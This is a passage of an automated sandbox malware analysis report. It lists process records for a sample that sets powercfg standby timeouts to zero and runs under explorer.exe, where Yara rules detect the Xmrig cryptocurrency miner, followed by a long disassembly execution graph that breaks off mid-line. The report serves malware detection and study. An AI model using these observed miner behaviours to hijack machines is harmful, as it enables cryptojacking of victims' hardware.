                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:52
                                        Start time:21:03:14
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:53
                                        Start time:21:03:14
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\powercfg.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                        Imagebase:0x7ff63f640000
                                        File size:96'256 bytes
                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:54
                                        Start time:21:03:14
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:55
                                        Start time:21:03:14
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\powercfg.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                        Imagebase:0x7ff63f640000
                                        File size:96'256 bytes
                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:56
                                        Start time:21:03:14
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:57
                                        Start time:21:03:14
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        General

                                        Target ID:58
                                        Start time:21:03:14
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:59
                                        Start time:21:03:14
                                        Start date:06/10/2024
                                        Path:C:\Windows\explorer.exe
                                        Wow64 process (32bit):false
                                        Commandline:explorer.exe
                                        Imagebase:0x7ff674740000
                                        File size:5'141'208 bytes
                                        MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003B.00000003.2189751609.0000000001118000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003B.00000003.3457810885.000000000117A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003B.00000003.2189751609.0000000001109000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003B.00000002.4507671698.0000000001118000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003B.00000002.4507448971.00000000010FE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003B.00000003.3457810885.0000000001118000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003B.00000002.4507671698.000000000117A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003B.00000002.4507448971.00000000010A9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003B.00000002.4507448971.00000000010E4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        Has exited:false

                                        General

                                        Target ID:62
                                        Start time:21:03:46
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\svchost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                        Imagebase:0x7ff7e52b0000
                                        File size:55'320 bytes
                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                        Has elevated privileges:true
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        Disassembly

                                        Reset < >

                                          Execution Graph

                                          Execution Coverage:2.4%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:10.6%
                                          Total number of Nodes:850
                                          Total number of Limit Nodes:2
                                          execution_graph 2840 140001ac3 2846 140001a70 2840->2846 2841 14000199e 2844 140001a0f 2841->2844 2845 1400019e9 VirtualProtect 2841->2845 2842 140001b36 2843 140001ba0 4 API calls 2842->2843 2847 140001b53 2843->2847 2845->2841 2846->2841 2846->2842 2846->2847 1992 140001ae4 1993 140001a70 1992->1993 1994 14000199e 1993->1994 1995 140001b36 1993->1995 1998 140001b53 1993->1998 1997 140001a0f 1994->1997 1999 1400019e9 VirtualProtect 1994->1999 2000 140001ba0 1995->2000 1999->1994 2002 140001bc2 2000->2002 2001 140001c04 memcpy 2001->1998 2002->2001 2004 140001c45 VirtualQuery 2002->2004 2005 140001cf4 2002->2005 2004->2005 2009 140001c72 2004->2009 2006 140001d23 GetLastError 2005->2006 2007 140001d37 2006->2007 2008 140001ca4 VirtualProtect 2008->2001 2008->2006 2009->2001 2009->2008 2037 140001404 2110 140001394 2037->2110 2039 140001413 2040 140001394 2 API calls 2039->2040 2041 140001422 2040->2041 2042 140001394 2 API calls 2041->2042 2043 140001431 2042->2043 2044 140001394 2 API calls 2043->2044 2045 140001440 2044->2045 2046 140001394 2 API calls 2045->2046 2047 14000144f 2046->2047 2048 140001394 2 API calls 2047->2048 2049 14000145e 2048->2049 2050 140001394 2 API calls 2049->2050 2051 14000146d 2050->2051 2052 140001394 2 API calls 2051->2052 2053 14000147c 2052->2053 2054 140001394 2 API calls 2053->2054 2055 14000148b 2054->2055 2056 140001394 2 API calls 2055->2056 2057 14000149a 2056->2057 2058 140001394 2 API calls 2057->2058 2059 1400014a9 2058->2059 2060 140001394 2 API calls 2059->2060 2061 1400014b8 2060->2061 2062 140001394 2 API calls 2061->2062 2063 1400014c7 2062->2063 2064 140001394 2 API calls 2063->2064 2065 1400014d6 2064->2065 2066 1400014e5 2065->2066 2067 140001394 2 API calls 2065->2067 2068 140001394 2 API calls 2066->2068 2067->2066 2069 1400014ef 2068->2069 2070 1400014f4 2069->2070 2071 140001394 2 API calls 2069->2071 2072 140001394 2 API calls 2070->2072 2071->2070 2073 1400014fe 2072->2073 2074 140001503 2073->2074 2075 140001394 2 API calls 2073->2075 2076 140001394 2 API calls 2074->2076 2075->2074 2077 14000150d 2076->2077 2078 140001394 2 API calls 2077->2078 2079 140001512 2078->2079 2080 140001394 2 API calls 2079->2080 2081 140001521 2080->2081 2082 140001394 2 API calls 2081->2082 2083 140001530 2082->2083 2084 140001394 2 API calls 2083->2084 2085 14000153f 2084->2085 2086 140001394 2 API calls 2085->2086 2087 14000154e 2086->2087 2088 140001394 2 API calls 2087->2088 2089 14000155d 2088->2089 2090 140001394 2 API calls 2089->2090 2091 14000156c 2090->2091 2092 140001394 2 API calls 2091->2092 2093 14000157b 2092->2093 2094 140001394 2 API calls 2093->2094 2095 14000158a 2094->2095 2096 140001394 2 API calls 2095->2096 2097 140001599 2096->2097 2098 140001394 2 API calls 2097->2098 2099 1400015a8 2098->2099 2100 140001394 2 API calls 2099->2100 2101 1400015b7 2100->2101 2102 140001394 2 API calls 2101->2102 2103 1400015c6 2102->2103 2104 140001394 2 API calls 2103->2104 2105 1400015d5 2104->2105 2106 140001394 2 API calls 2105->2106 2107 1400015e4 2106->2107 2108 140001394 2 API calls 2107->2108 2109 1400015f3 2108->2109 2111 140005a50 malloc 2110->2111 2112 1400013b8 2111->2112 2113 1400013c6 NtSetTimer2 2112->2113 2113->2039 2114 140002104 2115 140002111 EnterCriticalSection 2114->2115 2116 140002218 2114->2116 2117 14000220b LeaveCriticalSection 2115->2117 2121 14000212e 2115->2121 2118 140002272 2116->2118 2120 140002241 DeleteCriticalSection 2116->2120 2117->2116 2119 14000214d TlsGetValue GetLastError 2119->2121 2120->2118 2121->2117 2121->2119 2010 140001e65 2011 140001e67 signal 2010->2011 2012 140001e7c 2011->2012 2014 140001e99 2011->2014 2013 140001e82 signal 2012->2013 2012->2014 2013->2014 2848 140001f47 2849 140001e67 signal 2848->2849 2852 140001e99 2848->2852 2850 140001e7c 2849->2850 2849->2852 2851 140001e82 signal 2850->2851 2850->2852 2851->2852 2015 14000216f 2016 140002185 2015->2016 2017 140002178 InitializeCriticalSection 2015->2017 2017->2016 2018 140001a70 2019 14000199e 2018->2019 2023 140001a7d 2018->2023 2020 140001a0f 2019->2020 2021 1400019e9 VirtualProtect 2019->2021 2021->2019 2022 140001b53 2023->2018 2023->2022 2024 140001b36 2023->2024 2025 140001ba0 4 API calls 2024->2025 2025->2022 2122 140001e10 2123 140001e2f 2122->2123 2124 140001ecc 2123->2124 2128 140001eb5 2123->2128 2129 140001e55 2123->2129 2125 140001ed3 signal 2124->2125 2124->2128 2126 140001ee4 2125->2126 2125->2128 2127 140001eea signal 2126->2127 2126->2128 2127->2128 2129->2128 2130 140001f12 signal 2129->2130 2130->2128 2853 140002050 2854 14000205e EnterCriticalSection 2853->2854 2855 1400020cf 2853->2855 2856 1400020c2 LeaveCriticalSection 2854->2856 2857 140002079 2854->2857 2856->2855 2857->2856 2858 140001fd0 2859 140002033 2858->2859 2860 140001fe4 2858->2860 2860->2859 2861 140001ffd EnterCriticalSection LeaveCriticalSection 2860->2861 2861->2859 2139 140001ab3 2140 140001a70 2139->2140 2140->2139 2141 14000199e 2140->2141 2142 140001b36 2140->2142 2145 140001b53 2140->2145 2144 140001a0f 2141->2144 2146 1400019e9 VirtualProtect 2141->2146 2143 140001ba0 4 API calls 2142->2143 2143->2145 2146->2141 1982 140001394 1986 140005a50 1982->1986 1984 1400013b8 1985 1400013c6 NtSetTimer2 1984->1985 1987 140005a6e 1986->1987 1990 140005a9b 1986->1990 1987->1984 1988 140005b43 1989 140005b5f malloc 1988->1989 1991 140005b80 1989->1991 1990->1987 1990->1988 1991->1987 2131 14000219e 2132 140002272 2131->2132 2133 1400021ab EnterCriticalSection 2131->2133 2134 140002265 LeaveCriticalSection 2133->2134 2136 1400021c8 2133->2136 2134->2132 2135 1400021e9 TlsGetValue GetLastError 2135->2136 2136->2134 2136->2135 2026 140001800 2027 140001812 2026->2027 2028 140001835 fprintf 2027->2028 2029 140001000 2030 14000108b __set_app_type 2029->2030 2031 140001040 2029->2031 2033 1400010b6 2030->2033 2031->2030 2032 1400010e5 2033->2032 2035 140001e00 2033->2035 2036 140005fe0 __setusermatherr 2035->2036 2137 140002320 strlen 2138 140002337 2137->2138 2147 140001140 2150 140001160 2147->2150 2149 140001156 2151 1400011b9 2150->2151 2152 14000118b 2150->2152 2153 1400011d3 2151->2153 2154 1400011c7 _amsg_exit 2151->2154 2152->2151 2155 1400011a0 Sleep 2152->2155 2156 140001201 _initterm 2153->2156 2157 14000121a 2153->2157 2154->2153 2155->2151 2155->2152 2156->2157 2173 140001880 2157->2173 2160 14000126a 2161 14000126f malloc 2160->2161 2162 14000128b 2161->2162 2164 1400012d0 2161->2164 2163 1400012a0 strlen malloc memcpy 2162->2163 2163->2163 2163->2164 2184 140003160 2164->2184 2166 140001315 2167 140001344 2166->2167 2168 140001324 2166->2168 2171 140001160 52 API calls 2167->2171 2169 140001338 2168->2169 2170 14000132d _cexit 2168->2170 2169->2149 2170->2169 2172 140001366 2171->2172 2172->2149 2174 140001247 SetUnhandledExceptionFilter 2173->2174 2175 1400018a2 2173->2175 2174->2160 2175->2174 2176 14000194d 2175->2176 2180 140001a20 2175->2180 2177 14000199e 2176->2177 2178 140001ba0 4 API calls 2176->2178 2177->2174 2179 1400019e9 VirtualProtect 2177->2179 2178->2176 2179->2177 2180->2177 2181 140001b53 2180->2181 2182 140001b36 2180->2182 2183 140001ba0 4 API calls 2182->2183 2183->2181 2186 140003176 2184->2186 2185 14000325d wcslen 2260 14000153f 2185->2260 2186->2185 2189 14000345e 2189->2166 2195 140003358 2196 140003400 wcslen 2195->2196 2197 140003416 2196->2197 2199 14000345c 2196->2199 2197->2199 2200 140003446 wcslen 2197->2200 2198 140003521 wcscpy wcscat 2202 140003553 2198->2202 2199->2198 2200->2197 2200->2199 2201 1400035a3 wcscpy wcscat 2204 1400035d9 2201->2204 2202->2201 2203 1400036ee wcscpy wcscat 2205 140003727 2203->2205 2204->2203 2206 140003a78 wcslen 2205->2206 2207 140003a86 2206->2207 2209 140003abb 2206->2209 2207->2209 2210 140003aa6 wcslen 2207->2210 2208 140003b72 wcscpy wcscat 2212 140003ba7 2208->2212 2209->2208 2210->2207 2210->2209 2211 140003bf7 wcscpy wcscat 2214 140003c30 2211->2214 2212->2211 2213 140003c6d wcscpy wcscat 2216 140003cb4 2213->2216 2214->2213 2215 140003d06 wcscpy wcscat wcslen 2400 14000146d 2215->2400 2216->2215 2221 140003e1d 2486 1400014a9 2221->2486 2222 140003f4f 2224 14000145e 2 API calls 2222->2224 2229 140003eb4 2224->2229 2226 140005698 2227 140003f3e 2230 14000145e 2 API calls 2227->2230 2228 140003fe1 wcscpy wcscat wcslen 2255 1400040b0 2228->2255 2229->2226 2229->2228 2230->2229 2234 140003ea8 2235 14000145e 2 API calls 2234->2235 2235->2229 2236 1400041a5 wcslen 2237 14000153f 2 API calls 2236->2237 2237->2255 2238 14000534a memcpy 2238->2255 2239 14000540e memcpy 2239->2255 2240 1400043e3 wcslen 2647 14000157b 2240->2647 2241 14000465d wcslen 2243 14000153f 2 API calls 2241->2243 2243->2255 2244 140004fe1 wcscpy wcscat wcslen 2245 140001422 2 API calls 2244->2245 2245->2255 2247 1400044db wcslen 2664 1400015a8 2247->2664 2250 140005123 2250->2166 2251 140005453 memcpy 2251->2255 2252 1400026e0 9 API calls 2252->2255 2253 1400051ce wcslen 2254 1400015a8 2 API calls 2253->2254 2254->2255 2255->2236 2255->2238 2255->2239 2255->2240 2255->2241 2255->2244 2255->2247 2255->2250 2255->2251 2255->2252 2255->2253 2256 140005545 memcpy 2255->2256 2257 140004e35 wcscpy wcscat wcslen 2255->2257 2259 14000145e NtSetTimer2 malloc 2255->2259 2602 1400014d6 2255->2602 2675 140001521 2255->2675 2773 140001431 2255->2773 2256->2255 2704 140001422 2257->2704 2259->2255 2261 140001394 2 API calls 2260->2261 2262 14000154e 2261->2262 2263 140001394 2 API calls 2262->2263 2264 14000155d 2263->2264 2265 140001394 2 API calls 2264->2265 2266 14000156c 2265->2266 2267 140001394 2 API calls 2266->2267 2268 14000157b 2267->2268 2269 140001394 2 API calls 2268->2269 2270 14000158a 2269->2270 2271 140001394 2 API calls 2270->2271 2272 140001599 2271->2272 2273 140001394 2 API calls 2272->2273 2274 1400015a8 2273->2274 2275 140001394 2 API calls 2274->2275 2276 1400015b7 2275->2276 2277 140001394 2 API calls 2276->2277 2278 1400015c6 2277->2278 2279 140001394 2 API calls 2278->2279 2280 1400015d5 2279->2280 2281 140001394 2 API calls 2280->2281 2282 1400015e4 2281->2282 2283 140001394 2 API calls 2282->2283 2284 1400015f3 2283->2284 2284->2189 2285 140001503 2284->2285 2286 140001394 2 API calls 2285->2286 2287 14000150d 2286->2287 2288 140001394 2 API calls 2287->2288 2289 140001512 2288->2289 2290 140001394 2 API calls 2289->2290 2291 140001521 2290->2291 2292 140001394 2 API calls 2291->2292 2293 140001530 2292->2293 2294 140001394 2 API calls 2293->2294 2295 14000153f 2294->2295 2296 140001394 2 API calls 2295->2296 2297 14000154e 2296->2297 2298 140001394 2 API calls 2297->2298 2299 14000155d 2298->2299 2300 140001394 2 API calls 2299->2300 2301 14000156c 2300->2301 2302 140001394 2 API calls 2301->2302 2303 14000157b 2302->2303 2304 140001394 2 API calls 2303->2304 2305 14000158a 2304->2305 2306 140001394 2 API calls 2305->2306 2307 140001599 2306->2307 2308 140001394 2 API calls 2307->2308 2309 1400015a8 2308->2309 2310 140001394 2 API calls 2309->2310 2311 1400015b7 2310->2311 2312 140001394 2 API calls 2311->2312 2313 1400015c6 2312->2313 2314 140001394 2 API calls 2313->2314 2315 1400015d5 2314->2315 2316 140001394 2 API calls 2315->2316 2317 1400015e4 2316->2317 2318 140001394 2 API calls 2317->2318 2319 1400015f3 2318->2319 2319->2195 2320 14000156c 2319->2320 2321 140001394 2 API calls 2320->2321 2322 14000157b 2321->2322 2323 140001394 2 API calls 2322->2323 2324 14000158a 2323->2324 2325 140001394 2 API calls 2324->2325 2326 140001599 2325->2326 2327 140001394 2 API calls 2326->2327 2328 1400015a8 2327->2328 2329 140001394 2 API calls 2328->2329 2330 1400015b7 2329->2330 2331 140001394 2 API calls 2330->2331 2332 1400015c6 2331->2332 2333 140001394 2 API calls 2332->2333 2334 1400015d5 2333->2334 2335 140001394 2 API calls 2334->2335 2336 1400015e4 2335->2336 2337 140001394 2 API calls 2336->2337 2338 1400015f3 2337->2338 2338->2195 2339 14000145e 2338->2339 2340 140001394 2 API calls 2339->2340 2341 14000146d 2340->2341 2342 140001394 2 API calls 2341->2342 2343 14000147c 2342->2343 2344 140001394 2 API calls 2343->2344 2345 14000148b 2344->2345 2346 140001394 2 API calls 2345->2346 2347 14000149a 2346->2347 2348 140001394 2 API calls 2347->2348 2349 1400014a9 2348->2349 2350 140001394 2 API calls 2349->2350 2351 1400014b8 2350->2351 2352 140001394 2 API calls 2351->2352 2353 1400014c7 2352->2353 2354 140001394 2 API calls 2353->2354 2355 1400014d6 2354->2355 2356 1400014e5 2355->2356 2357 140001394 2 API calls 2355->2357 2358 140001394 2 API calls 2356->2358 2357->2356 2359 1400014ef 2358->2359 2360 1400014f4 2359->2360 2361 140001394 2 API calls 2359->2361 2362 140001394 2 API calls 2360->2362 2361->2360 2363 1400014fe 2362->2363 2364 140001503 2363->2364 2365 140001394 2 API calls 2363->2365 2366 140001394 2 API calls 2364->2366 2365->2364 2367 14000150d 2366->2367 2368 140001394 2 API calls 2367->2368 2369 140001512 2368->2369 2370 140001394 2 API calls 2369->2370 2371 140001521 2370->2371 2372 140001394 2 API calls 2371->2372 2373 140001530 2372->2373 2374 140001394 2 API calls 2373->2374 2375 14000153f 2374->2375 2376 140001394 2 API calls 2375->2376 2377 14000154e 2376->2377 2378 140001394 2 API calls 2377->2378 2379 14000155d 2378->2379 2380 140001394 2 API calls 2379->2380 2381 14000156c 2380->2381 2382 140001394 2 API calls 2381->2382 2383 14000157b 2382->2383 2384 140001394 2 API calls 2383->2384 2385 14000158a 2384->2385 2386 140001394 2 API calls 2385->2386 2387 140001599 2386->2387 2388 140001394 2 API calls 2387->2388 2389 1400015a8 2388->2389 2390 140001394 2 API calls 2389->2390 2391 1400015b7 2390->2391 2392 140001394 2 API calls 2391->2392 2393 1400015c6 2392->2393 2394 140001394 2 API calls 2393->2394 2395 1400015d5 2394->2395 2396 140001394 2 API calls 2395->2396 2397 1400015e4 2396->2397 2398 140001394 2 API calls 2397->2398 2399 1400015f3 2398->2399 2399->2195 2401 140001394 2 API calls 2400->2401 2402 14000147c 2401->2402 2403 140001394 2 API calls 2402->2403 2404 14000148b 2403->2404 2405 140001394 2 API calls 2404->2405 2406 14000149a 2405->2406 2407 140001394 2 API calls 2406->2407 2408 1400014a9 2407->2408 2409 140001394 2 API calls 2408->2409 2410 1400014b8 2409->2410 2411 140001394 2 API calls 2410->2411 2412 1400014c7 2411->2412 2413 140001394 2 API calls 2412->2413 2414 1400014d6 2413->2414 2415 1400014e5 2414->2415 2416 140001394 2 API calls 2414->2416 2417 140001394 2 API calls 2415->2417 2416->2415 2418 1400014ef 2417->2418 2419 1400014f4 2418->2419 2420 140001394 2 API calls 2418->2420 2421 140001394 2 API calls 2419->2421 2420->2419 2422 1400014fe 2421->2422 2423 140001503 2422->2423 2424 140001394 2 API calls 2422->2424 2425 140001394 2 API calls 2423->2425 2424->2423 2426 14000150d 2425->2426 2427 140001394 2 API calls 2426->2427 2428 140001512 2427->2428 2429 140001394 2 API calls 2428->2429 2430 140001521 2429->2430 2431 140001394 2 API calls 2430->2431 2432 140001530 2431->2432 2433 140001394 2 API calls 2432->2433 2434 14000153f 2433->2434 2435 140001394 2 API calls 2434->2435 2436 14000154e 2435->2436 2437 140001394 2 API calls 2436->2437 2438 14000155d 2437->2438 2439 140001394 2 API calls 2438->2439 2440 14000156c 2439->2440 2441 140001394 2 API calls 2440->2441 2442 14000157b 2441->2442 2443 140001394 2 API calls 2442->2443 2444 14000158a 2443->2444 2445 140001394 2 API calls 2444->2445 2446 140001599 2445->2446 2447 140001394 2 API calls 2446->2447 2448 1400015a8 2447->2448 2449 140001394 2 API calls 2448->2449 2450 1400015b7 2449->2450 2451 140001394 2 API calls 2450->2451 2452 1400015c6 2451->2452 2453 140001394 2 API calls 2452->2453 2454 1400015d5 2453->2454 2455 140001394 2 API calls 2454->2455 2456 1400015e4 2455->2456 2457 140001394 2 API calls 2456->2457 2458 1400015f3 2457->2458 2458->2229 2459 140001530 2458->2459 2460 140001394 2 API calls 2459->2460 2461 14000153f 2460->2461 2462 140001394 2 API calls 2461->2462 2463 14000154e 2462->2463 2464 140001394 2 API calls 2463->2464 2465 14000155d 2464->2465 2466 140001394 2 API calls 2465->2466 2467 14000156c 2466->2467 2468 140001394 2 API calls 2467->2468 2469 14000157b 2468->2469 2470 140001394 2 API calls 2469->2470 2471 14000158a 2470->2471 2472 140001394 2 API calls 2471->2472 2473 140001599 2472->2473 2474 140001394 2 API calls 2473->2474 2475 1400015a8 2474->2475 2476 140001394 2 API calls 2475->2476 2477 1400015b7 2476->2477 2478 140001394 2 API calls 2477->2478 2479 1400015c6 2478->2479 2480 140001394 2 API calls 2479->2480 2481 1400015d5 2480->2481 2482 140001394 2 API calls 2481->2482 2483 1400015e4 2482->2483 2484 140001394 2 API calls 2483->2484 2485 1400015f3 2484->2485 2485->2221 2485->2222 2487 140001394 2 API calls 2486->2487 2488 1400014b8 2487->2488 2489 140001394 2 API calls 2488->2489 2490 1400014c7 2489->2490 2491 140001394 2 API calls 2490->2491 2492 1400014d6 2491->2492 2493 1400014e5 2492->2493 2494 140001394 2 API calls 2492->2494 2495 140001394 2 API calls 2493->2495 2494->2493 2496 1400014ef 2495->2496 2497 1400014f4 2496->2497 2498 140001394 2 API calls 2496->2498 2499 140001394 2 API calls 2497->2499 2498->2497 2500 1400014fe 2499->2500 2501 140001503 2500->2501 2502 140001394 2 API calls 2500->2502 2503 140001394 2 API calls 2501->2503 2502->2501 2504 14000150d 2503->2504 2505 140001394 2 API calls 2504->2505 2506 140001512 2505->2506 2507 140001394 2 API calls 2506->2507 2508 140001521 2507->2508 2509 140001394 2 API calls 2508->2509 2510 140001530 2509->2510 2511 140001394 2 API calls 2510->2511 2512 14000153f 2511->2512 2513 140001394 2 API calls 2512->2513 2514 14000154e 2513->2514 2515 140001394 2 API calls 2514->2515 2516 14000155d 2515->2516 2517 140001394 2 API calls 2516->2517 2518 14000156c 2517->2518 2519 140001394 2 API calls 2518->2519 2520 14000157b 2519->2520 2521 140001394 2 API calls 2520->2521 2522 14000158a 2521->2522 2523 140001394 2 API calls 2522->2523 2524 140001599 2523->2524 2525 140001394 2 API calls 2524->2525 2526 1400015a8 2525->2526 2527 140001394 2 API calls 2526->2527 2528 1400015b7 2527->2528 2529 140001394 2 API calls 2528->2529 2530 1400015c6 2529->2530 2531 140001394 2 API calls 2530->2531 2532 1400015d5 2531->2532 2533 140001394 2 API calls 2532->2533 2534 1400015e4 2533->2534 2535 140001394 2 API calls 2534->2535 2536 1400015f3 2535->2536 2536->2227 2537 140001440 2536->2537 2538 140001394 2 API calls 2537->2538 2539 14000144f 2538->2539 2540 140001394 2 API calls 2539->2540 2541 14000145e 2540->2541 2542 140001394 2 API calls 2541->2542 2543 14000146d 2542->2543 2544 140001394 2 API calls 2543->2544 2545 14000147c 2544->2545 2546 140001394 2 API calls 2545->2546 2547 14000148b 2546->2547 2548 140001394 2 API calls 2547->2548 2549 14000149a 2548->2549 2550 140001394 2 API calls 2549->2550 2551 1400014a9 2550->2551 2552 140001394 2 API calls 2551->2552 2553 1400014b8 2552->2553 2554 140001394 2 API calls 2553->2554 2555 1400014c7 2554->2555 2556 140001394 2 API calls 2555->2556 2557 1400014d6 2556->2557 2558 1400014e5 2557->2558 2559 140001394 2 API calls 2557->2559 2560 140001394 2 API calls 2558->2560 2559->2558 2561 1400014ef 2560->2561 2562 1400014f4 2561->2562 2563 140001394 2 API calls 2561->2563 2564 140001394 2 API calls 2562->2564 2563->2562 2565 1400014fe 2564->2565 2566 140001503 2565->2566 2567 140001394 2 API calls 2565->2567 2568 140001394 2 API calls 2566->2568 2567->2566 2569 14000150d 2568->2569 2570 140001394 2 API calls 2569->2570 2571 140001512 2570->2571 2572 140001394 2 API calls 2571->2572 2573 140001521 2572->2573 2574 140001394 2 API calls 2573->2574 2575 140001530 2574->2575 2576 140001394 2 API calls 2575->2576 2577 14000153f 2576->2577 2578 140001394 2 API calls 2577->2578 2579 14000154e 2578->2579 2580 140001394 2 API calls 2579->2580 2581 14000155d 2580->2581 2582 140001394 2 API calls 2581->2582 2583 14000156c 2582->2583 2584 140001394 2 API calls 2583->2584 2585 14000157b 2584->2585 2586 140001394 2 API calls 2585->2586 2587 14000158a 2586->2587 2588 140001394 2 API calls 2587->2588 2589 140001599 2588->2589 2590 140001394 2 API calls 2589->2590 2591 1400015a8 2590->2591 2592 140001394 2 API calls 2591->2592 2593 1400015b7 2592->2593 2594 140001394 2 API calls 2593->2594 2595 1400015c6 2594->2595 2596 140001394 2 API calls 2595->2596 2597 1400015d5 2596->2597 2598 140001394 2 API calls 2597->2598 2599 1400015e4 2598->2599 2600 140001394 2 API calls 2599->2600 2601 1400015f3 2600->2601 2601->2227 2601->2234 2603 1400014e5 2602->2603 2604 140001394 2 API calls 2602->2604 2605 140001394 2 API calls 2603->2605 2604->2603 2606 1400014ef 2605->2606 2607 1400014f4 2606->2607 2608 140001394 2 API calls 2606->2608 2609 140001394 2 API calls 2607->2609 2608->2607 2610 1400014fe 2609->2610 2611 140001503 2610->2611 2612 140001394 2 API calls 2610->2612 2613 140001394 2 API calls 2611->2613 2612->2611 2614 14000150d 2613->2614 2615 140001394 2 API calls 2614->2615 2616 140001512 2615->2616 2617 140001394 2 API calls 2616->2617 2618 140001521 2617->2618 2619 140001394 2 API calls 2618->2619 2620 140001530 2619->2620 2621 140001394 2 API calls 2620->2621 2622 14000153f 2621->2622 2623 140001394 2 API calls 2622->2623 2624 14000154e 2623->2624 2625 140001394 2 API calls 2624->2625 2626 14000155d 2625->2626 2627 140001394 2 API calls 2626->2627 2628 14000156c 2627->2628 2629 140001394 2 API calls 2628->2629 2630 14000157b 2629->2630 2631 140001394 2 API calls 2630->2631 2632 14000158a 2631->2632 2633 140001394 2 API calls 2632->2633 2634 140001599 2633->2634 2635 140001394 2 API calls 2634->2635 2636 1400015a8 2635->2636 2637 140001394 2 API calls 2636->2637 2638 1400015b7 2637->2638 2639 140001394 2 API calls 2638->2639 2640 1400015c6 2639->2640 2641 140001394 2 API calls 2640->2641 2642 1400015d5 2641->2642 2643 140001394 2 API calls 2642->2643 2644 1400015e4 2643->2644 2645 140001394 2 API calls 2644->2645 2646 1400015f3 2645->2646 2646->2255 2648 140001394 2 API calls 2647->2648 2649 14000158a 2648->2649 2650 140001394 2 API calls 2649->2650 2651 140001599 2650->2651 2652 140001394 2 API calls 2651->2652 2653 1400015a8 2652->2653 2654 140001394 2 API calls 2653->2654 2655 1400015b7 2654->2655 2656 140001394 2 API calls 2655->2656 2657 1400015c6 2656->2657 2658 140001394 2 API calls 2657->2658 2659 